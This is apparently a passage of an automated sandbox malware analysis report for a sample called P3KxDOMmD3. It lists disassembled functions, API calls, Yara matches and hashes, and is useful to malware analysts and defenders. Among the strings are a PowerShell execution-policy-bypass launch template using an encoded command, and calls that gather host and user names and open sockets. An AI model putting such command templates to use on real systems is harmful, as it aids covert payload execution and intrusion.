                                                                    • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                                                                  • __lock_fhandle.LIBCMT ref: 001C7077
                                                                  • _lseeki64_nolock.LIBCMT ref: 001C7090
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                                                                  • String ID:
                                                                  • API String ID: 4140391395-0
                                                                  • Opcode ID: 19101616f3e261a9beafbca214444aa2a5cb8e231afb96d714edbab2d78f6c11
                                                                  • Instruction ID: 058669ddc30177cea810e3a2b2250b9773ba6fff2ecb30b693514bc95a488f4f
                                                                  • Opcode Fuzzy Hash: 19101616f3e261a9beafbca214444aa2a5cb8e231afb96d714edbab2d78f6c11
                                                                  • Instruction Fuzzy Hash: 8711022270428055EB052F659802B7DBA11A7B2BB1F19471CBE350B7D2CBBCC8A1CB21
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 001C6EBB
                                                                    • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                                                                  • __doserrno.LIBCMT ref: 001C6EB3
                                                                    • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                                                                  • __lock_fhandle.LIBCMT ref: 001C6EFF
                                                                  • _lseek_nolock.LIBCMT ref: 001C6F18
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                                                                  • String ID:
                                                                  • API String ID: 310312816-0
                                                                  • Opcode ID: 58556fb0ae643294109593e6a1f551c1d1756168c239dbf47c2b40feda9217b5
                                                                  • Instruction ID: bfdf8927219a1c0db9bc5fb0f70ec63aa55916b6475b4c1005a446d7f9587be5
                                                                  • Opcode Fuzzy Hash: 58556fb0ae643294109593e6a1f551c1d1756168c239dbf47c2b40feda9217b5
                                                                  • Instruction Fuzzy Hash: 0D11033270068055D7066F65E862B7D6A61BBB1BA1F5A422DBA150B3D2CB7CC891C724
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 00687ABB
                                                                    • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                                                                  • __doserrno.LIBCMT ref: 00687AB3
                                                                    • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                                                                  • __lock_fhandle.LIBCMT ref: 00687AFF
                                                                  • _lseek_nolock.LIBCMT ref: 00687B18
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                                                                  • String ID:
                                                                  • API String ID: 310312816-0
                                                                  • Opcode ID: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                                                                  • Instruction ID: 24f0610d08a0e9dc992270e57341d53098f47f79d343df18f8d8b644598904b5
                                                                  • Opcode Fuzzy Hash: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                                                                  • Instruction Fuzzy Hash: 2411783270824046E7167F65E89136DB663BB817A1F29431DEE251B3D1CB7CC882D719
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 00687C33
                                                                    • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                                                                  • __doserrno.LIBCMT ref: 00687C2B
                                                                    • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                                                                  • __lock_fhandle.LIBCMT ref: 00687C77
                                                                  • _lseeki64_nolock.LIBCMT ref: 00687C90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                                                                  • String ID:
                                                                  • API String ID: 4140391395-0
                                                                  • Opcode ID: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                                                                  • Instruction ID: 5dc25f8dcf996d4c8157047387c0dd1f90f798925ef1df76545ee2abbc0fabdd
                                                                  • Opcode Fuzzy Hash: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                                                                  • Instruction Fuzzy Hash: 451156327086404AEB567F26E85136D7A53AB81BB1F294718FE391B3D2CB3CC442C729
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno
                                                                  • String ID:
                                                                  • API String ID: 2288870239-0
                                                                  • Opcode ID: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                                                                  • Instruction ID: ddea1815f7091b6444c24c87483e48f1ed0a7c78e2103579739e950a14cedbcc
                                                                  • Opcode Fuzzy Hash: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                                                                  • Instruction Fuzzy Hash: 5831F635601A8185FE18EF55ECA53EC23A1BBA8BA0F5C0239DD1E0B6A1DF2CC446C351
                                                                  APIs
                                                                  Strings
                                                                  • Address %p has no image-section, xrefs: 00401DC0
                                                                  • VirtualProtect failed with code 0x%x, xrefs: 00401F56
                                                                  • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                                                                  • Mingw-w64 runtime failure:, xrefs: 00401D88
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID: QueryVirtual
                                                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                  • API String ID: 1804819252-1534286854
                                                                  • Opcode ID: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
                                                                  • Instruction ID: 40df73200976b68941168ad0de7a995853c322167ef9a8bb8888d12721705d67
                                                                  • Opcode Fuzzy Hash: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
                                                                  • Instruction Fuzzy Hash: ED51DDB2701B4092DB118F22E98475E77A0F799BE9F54823AEF58173E1EA3CC581C348
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 001C585F
                                                                    • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                                                                  • __doserrno.LIBCMT ref: 001C5857
                                                                    • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                                                                  • __lock_fhandle.LIBCMT ref: 001C58A3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                                                                  • String ID:
                                                                  • API String ID: 2611593033-0
                                                                  • Opcode ID: 268773e762f2e10da4a59bd6545c27f05d9dc8848c407f150f864121acff7d22
                                                                  • Instruction ID: 634e98f625f9fa467a82c9908df3940d2cda5850be515b119fa48cb2f3079672
                                                                  • Opcode Fuzzy Hash: 268773e762f2e10da4a59bd6545c27f05d9dc8848c407f150f864121acff7d22
                                                                  • Instruction Fuzzy Hash: 56113632B00A8096D7052F66EC42B7D7A22B7B1BA1F5A421DAA150B3D2CB7CD881D720
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 0068645F
                                                                    • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                                                                  • __doserrno.LIBCMT ref: 00686457
                                                                    • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                                                                  • __lock_fhandle.LIBCMT ref: 006864A3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                                                                  • String ID:
                                                                  • API String ID: 2611593033-0
                                                                  • Opcode ID: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                                                                  • Instruction ID: c3f53764061b736138cf567853190568bf4f5ca1a6f594924a029798c2a7fa8e
                                                                  • Opcode Fuzzy Hash: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                                                                  • Instruction Fuzzy Hash: 7011563270024046E756BF65E85132D7A93AB81BB1F59831DFE251B3D2CB7CC842C729
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 2289611984-0
                                                                  • Opcode ID: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                                                                  • Instruction ID: 0d8c8305014683f044f82c85f488e99059061193ed71ff6f56693760bce6f3a0
                                                                  • Opcode Fuzzy Hash: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                                                                  • Instruction Fuzzy Hash: D811383530064185F716BFE5A8A036D7667AB81B60F19432EDF160B391CB78C882A35A
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 001C5079
                                                                    • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                                                                  • __doserrno.LIBCMT ref: 001C5071
                                                                    • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                                                                  • __lock_fhandle.LIBCMT ref: 001C50BD
                                                                  • _close_nolock.LIBCMT ref: 001C50D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                                                                  • String ID:
                                                                  • API String ID: 4060740672-0
                                                                  • Opcode ID: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
                                                                  • Instruction ID: 3e54719696332346c6774f72743f91e7305863619329b9cc4123aa14db80aef9
                                                                  • Opcode Fuzzy Hash: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
                                                                  • Instruction Fuzzy Hash: E4113632700A8495D3056F75EC86B6C7A12B7B17A1F6E462CFA1A473D3C7B8C8D18750
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 00685C79
                                                                    • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                                                                  • __doserrno.LIBCMT ref: 00685C71
                                                                    • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                                                                  • __lock_fhandle.LIBCMT ref: 00685CBD
                                                                  • _close_nolock.LIBCMT ref: 00685CD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                                                                  • String ID:
                                                                  • API String ID: 4060740672-0
                                                                  • Opcode ID: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                                                                  • Instruction ID: 14533b4ae420227cbd097e30d8214636af86d3ccf5c4f633f6a5fb2d41b8138a
                                                                  • Opcode Fuzzy Hash: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                                                                  • Instruction Fuzzy Hash: 91112932700B8046E756BF65EC9532C7A53AF81761F69472DEE1B4B3D2C7B8C8428B19
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 001A3AA9
                                                                    • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                                                                    • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                                                                    • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                                                                  • malloc.LIBCMT ref: 001A3AB3
                                                                    • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D
                                                                  • malloc.LIBCMT ref: 001A3ABE
                                                                  • free.LIBCMT ref: 001A3C7E
                                                                  • free.LIBCMT ref: 001A3C86
                                                                  • free.LIBCMT ref: 001A3C8E
                                                                    • Part of subcall function 001A48F0: malloc.LIBCMT ref: 001A493A
                                                                    • Part of subcall function 001A48F0: malloc.LIBCMT ref: 001A4945
                                                                    • Part of subcall function 001A48F0: free.LIBCMT ref: 001A4A2C
                                                                    • Part of subcall function 001A48F0: free.LIBCMT ref: 001A4A34
                                                                  • free.LIBCMT ref: 001A3C9A
                                                                  • free.LIBCMT ref: 001A3CA7
                                                                  • free.LIBCMT ref: 001A3CB4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$malloc$_errno$_callnewh
                                                                  • String ID:
                                                                  • API String ID: 4160633307-0
                                                                  • Opcode ID: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
                                                                  • Instruction ID: 209368a58deb9e4cad09f9a49730c8180387322b07902ac6a1c357e03485ee58
                                                                  • Opcode Fuzzy Hash: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
                                                                  • Instruction Fuzzy Hash: 4D61056630478446DF25EF2698507AFBB91F7A6FD8F044126EE4A57B09DF38C606CB00
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 006646A9
                                                                    • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                                                                    • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                                                                    • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                                                                    • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                                                                  • malloc.LIBCMT ref: 006646B3
                                                                    • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D
                                                                  • malloc.LIBCMT ref: 006646BE
                                                                  • free.LIBCMT ref: 0066487E
                                                                  • free.LIBCMT ref: 00664886
                                                                  • free.LIBCMT ref: 0066488E
                                                                    • Part of subcall function 006654F0: malloc.LIBCMT ref: 0066553A
                                                                    • Part of subcall function 006654F0: malloc.LIBCMT ref: 00665545
                                                                    • Part of subcall function 006654F0: free.LIBCMT ref: 0066562C
                                                                    • Part of subcall function 006654F0: free.LIBCMT ref: 00665634
                                                                  • free.LIBCMT ref: 0066489A
                                                                  • free.LIBCMT ref: 006648A7
                                                                  • free.LIBCMT ref: 006648B4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$malloc$_errno$_callnewh$AllocHeap
                                                                  • String ID:
                                                                  • API String ID: 3534990644-0
                                                                  • Opcode ID: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                                                                  • Instruction ID: 34910b46c727ce7705f8db602624640e91d5cf5abd5de39ae3148aadea8298a6
                                                                  • Opcode Fuzzy Hash: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                                                                  • Instruction Fuzzy Hash: 0A61D0227087C586DB65AF669450BAA7B93FB85BC8F448129DE4A47B06DF38C906CB04
                                                                  APIs
                                                                    • Part of subcall function 001B53EC: malloc.LIBCMT ref: 001B5408
                                                                  • malloc.LIBCMT ref: 001ABF3B
                                                                    • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                                                                    • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                                                                    • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                                                                    • Part of subcall function 001BB630: _time64.LIBCMT ref: 001BB654
                                                                    • Part of subcall function 001BB630: malloc.LIBCMT ref: 001BB69C
                                                                    • Part of subcall function 001BB630: strtok.LIBCMT ref: 001BB700
                                                                    • Part of subcall function 001BB630: strtok.LIBCMT ref: 001BB711
                                                                    • Part of subcall function 001B28A0: _time64.LIBCMT ref: 001B28AE
                                                                    • Part of subcall function 001BDEA8: malloc.LIBCMT ref: 001BDEF8
                                                                    • Part of subcall function 001BDEA8: realloc.LIBCMT ref: 001BDF07
                                                                  • malloc.LIBCMT ref: 001AC04A
                                                                  • _snprintf.LIBCMT ref: 001AC0C1
                                                                  • _snprintf.LIBCMT ref: 001AC0E7
                                                                  • _snprintf.LIBCMT ref: 001AC10E
                                                                  • free.LIBCMT ref: 001AC2C6
                                                                    • Part of subcall function 001BA144: malloc.LIBCMT ref: 001BA178
                                                                    • Part of subcall function 001BA144: free.LIBCMT ref: 001BA32F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: malloc$_snprintf$_errno_time64freestrtok$_callnewhrealloc
                                                                  • String ID: /'); %s
                                                                  • API String ID: 1314452303-1283008465
                                                                  • Opcode ID: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                                                                  • Instruction ID: 2e1e53b0162e0ebcb552ed176464fe12739a6b053966d81585ff3166033a2d9c
                                                                  • Opcode Fuzzy Hash: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                                                                  • Instruction Fuzzy Hash: 0DA1D13530068186DB18FBB2E8917EE7392ABA67C1F804125FE5A47796DF3CC806C741
                                                                  APIs
                                                                    • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                                                                  • malloc.LIBCMT ref: 0067B528
                                                                    • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                                                                    • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                                                                    • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                                                                    • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                                                                    • Part of subcall function 0067EAA8: malloc.LIBCMT ref: 0067EAF8
                                                                  • GetComputerNameExA.KERNEL32 ref: 0067B5EA
                                                                  • GetComputerNameA.KERNEL32 ref: 0067B61F
                                                                  • GetUserNameA.ADVAPI32 ref: 0067B654
                                                                    • Part of subcall function 0066F014: WSASocketA.WS2_32 ref: 0066F042
                                                                  • malloc.LIBCMT ref: 0067B76D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: malloc$Name$Computer_errno$AllocHeapSocketUser_callnewh
                                                                  • String ID: VUUU
                                                                  • API String ID: 632458648-2040033107
                                                                  • Opcode ID: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                                                                  • Instruction ID: d29d9931251baad784a1826376812f60e93414938d2a0f9df4c39f6f065345ae
                                                                  • Opcode Fuzzy Hash: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                                                                  • Instruction Fuzzy Hash: 69913636700A9086EB44EF6AD8653AD2353BB89BC4FC0D029EE0D5BB56DF39C945C704
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _snprintf
                                                                  • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                                                                  • API String ID: 3512837008-1250630670
                                                                  • Opcode ID: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                                                                  • Instruction ID: 6a465962cabf8489c5691470ad028bed19716a351b7ab40bfcc4a69e4c0c2c17
                                                                  • Opcode Fuzzy Hash: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                                                                  • Instruction Fuzzy Hash: 7A719976300B85A6EB10DF61E8807ED77A1F799788F840526EE4E13BA8DF78C509C700
                                                                  APIs
                                                                    • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                                                                  • GetStartupInfoA.KERNEL32 ref: 00671540
                                                                    • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FE81
                                                                    • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FEA9
                                                                  • GetCurrentDirectoryW.KERNEL32 ref: 006715CD
                                                                  • GetCurrentDirectoryW.KERNEL32 ref: 006715DC
                                                                  • CreateProcessWithLogonW.ADVAPI32 ref: 00671637
                                                                  • GetLastError.KERNEL32 ref: 00671641
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
                                                                  • String ID: %s as %s\%s: %d
                                                                  • API String ID: 3435635427-816037529
                                                                  • Opcode ID: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                                                                  • Instruction ID: 80a158382953b88b06e520f675666d0f8cd5c6e7d3343fb356ae6e5c51471de1
                                                                  • Opcode Fuzzy Hash: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                                                                  • Instruction Fuzzy Hash: 35515A32204B8186DB60DF16F85475AB7AAF789B80F54802AEF8D97F29DF39C055CB44
                                                                  APIs
                                                                    • Part of subcall function 001B53EC: malloc.LIBCMT ref: 001B5408
                                                                    • Part of subcall function 001BFA20: _errno.LIBCMT ref: 001BF977
                                                                    • Part of subcall function 001BFA20: _invalid_parameter_noinfo.LIBCMT ref: 001BF982
                                                                  • fseek.LIBCMT ref: 001B0B30
                                                                    • Part of subcall function 001C02A4: _errno.LIBCMT ref: 001C02CC
                                                                    • Part of subcall function 001C02A4: _invalid_parameter_noinfo.LIBCMT ref: 001C02D7
                                                                  • _ftelli64.LIBCMT ref: 001B0B38
                                                                    • Part of subcall function 001C0318: _errno.LIBCMT ref: 001C0336
                                                                    • Part of subcall function 001C0318: _invalid_parameter_noinfo.LIBCMT ref: 001C0341
                                                                  • fseek.LIBCMT ref: 001B0B48
                                                                    • Part of subcall function 001C02A4: _fseek_nolock.LIBCMT ref: 001C02F5
                                                                  • malloc.LIBCMT ref: 001B0B88
                                                                    • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                                                                    • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                                                                    • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                                                                    • Part of subcall function 001AC444: malloc.LIBCMT ref: 001AC457
                                                                  • fclose.LIBCMT ref: 001B0C45
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$_callnewh_fseek_nolock_ftelli64fclose
                                                                  • String ID: mode
                                                                  • API String ID: 1756087678-2976727214
                                                                  • Opcode ID: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
                                                                  • Instruction ID: 90d0e5ddde56df2123dc45e1f2ef815405a37f99bc65f5c34af3800dbad401eb
                                                                  • Opcode Fuzzy Hash: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
                                                                  • Instruction Fuzzy Hash: B541D82631468082DB14EB12E8557AE7752F7EDBD0F808226EE5E47B96DF3CC506CB40
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 001B864F
                                                                    • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                                                                    • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                                                                    • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                                                                  • _snprintf.LIBCMT ref: 001B8667
                                                                    • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                                                                    • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                                                                  • free.LIBCMT ref: 001B867E
                                                                    • Part of subcall function 001BE644: _errno.LIBCMT ref: 001BE664
